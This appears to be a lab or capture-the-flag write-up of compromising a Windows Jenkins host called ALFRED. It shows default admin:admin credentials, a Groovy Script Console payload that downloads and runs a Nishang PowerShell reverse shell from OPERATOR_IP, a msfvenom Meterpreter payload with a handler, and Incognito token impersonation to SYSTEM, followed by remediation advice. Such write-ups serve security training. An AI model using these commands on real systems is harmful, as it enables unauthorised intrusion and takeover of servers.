Case file

Jenkins Script Console RCE and Windows token impersonation

Foundations Windows engagement: Jenkins on 8080 with admin:admin accepted Groovy RCE; Nishang reverse shell as bruce; Meterpreter Incognito impersonated BUILTIN\Administrators for SYSTEM-level access.

Foundations26 minWindows · Jenkins · PowerShell · Token Impersonation
  • Default Jenkins credentials unlocked Script Console RCE. A PowerShell reverse shell upgraded to Meterpreter; SeImpersonatePrivilege plus Incognito completed privilege escalation.

  • admin:admin authenticated; Groovy downloaded and ran Nishang for a reverse shell.

  • msfvenom exe downloaded and executed; multi/handler caught Meterpreter.

  • SeImpersonatePrivilege enabled; impersonate_token BUILTIN\Administrators elevated the session.

01

Engagement summary

Default Jenkins credentials unlocked Script Console RCE. A PowerShell reverse shell upgraded to Meterpreter; SeImpersonatePrivilege plus Incognito completed privilege escalation.

ALFRED (10.10.219.84) exposed IIS on 80, RDP on 3389, and Jetty/Jenkins on 8080. Jenkins accepted admin:admin. Manage Jenkins → Script Console executed Groovy that launched cmd and later a Nishang Invoke-PowerShellTcp reverse shell as bruce. We upgraded to a Meterpreter payload, loaded Incognito, listed tokens, and impersonated BUILTIN\Administrators — SeImpersonatePrivilege was enabled — then migrated and read the root artifact under System32\config.

Business impact

Default Jenkins credentials are remote code execution on the CI host. Script Console is an intentional RCE surface for authenticated admins. Token impersonation turns service privileges into Administrators. Change defaults, restrict Jenkins to VPN, disable Script Console for non-admins, and harden service accounts against impersonation abuse.

02

Jenkins login and Script Console

admin:admin authenticated; Groovy downloaded and ran Nishang for a reverse shell.

OPERATOR · JENKINS

savvy@lab:~$ nmap -sV 10.10.219.84

80/tcp open http Microsoft IIS httpd 7.5

8080/tcp open http Jetty 9.4.z-SNAPSHOT (Jenkins)

# http://10.10.219.84:8080 → admin / admin

PAYLOAD

script-console.groovy

cmd = "powershell iex (New-Object Net.WebClient).DownloadString('http://OPERATOR_IP:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress OPERATOR_IP -Port 1234"
println cmd.execute()

OPERATOR · SHELL

savvy@lab:~$ python3 -m http.server 8000

savvy@lab:~$ nc -lnvp 1234

PS C:\Users\bruce>

03

Meterpreter payload upgrade

msfvenom exe downloaded and executed; multi/handler caught Meterpreter.

OPERATOR · MSFVENOM

savvy@lab:~$ msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=OPERATOR_IP LPORT=5555 -f exe -o shell-test.exe

savvy@lab:~$ msfconsole -q

msf6 > use exploit/multi/handler

msf6 > set PAYLOAD windows/meterpreter/reverse_tcp

msf6 > set LPORT 5555

msf6 > run

# on target: DownloadFile shell-test.exe && Start-Process

Meterpreter session 1 opened

04

Incognito token impersonation

SeImpersonatePrivilege enabled; impersonate_token BUILTIN\Administrators elevated the session.

OPERATOR · INCOGNITO

meterpreter > getuid

Server username: alfred\bruce

meterpreter > load incognito

meterpreter > list_tokens -g

BUILTIN\Administrators

meterpreter > impersonate_token "BUILTIN\\Administrators"

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

Remediation

Rotate Jenkins credentials; bind the console to management networks only. Limit Script Console. Run Jenkins under least privilege and monitor for token impersonation.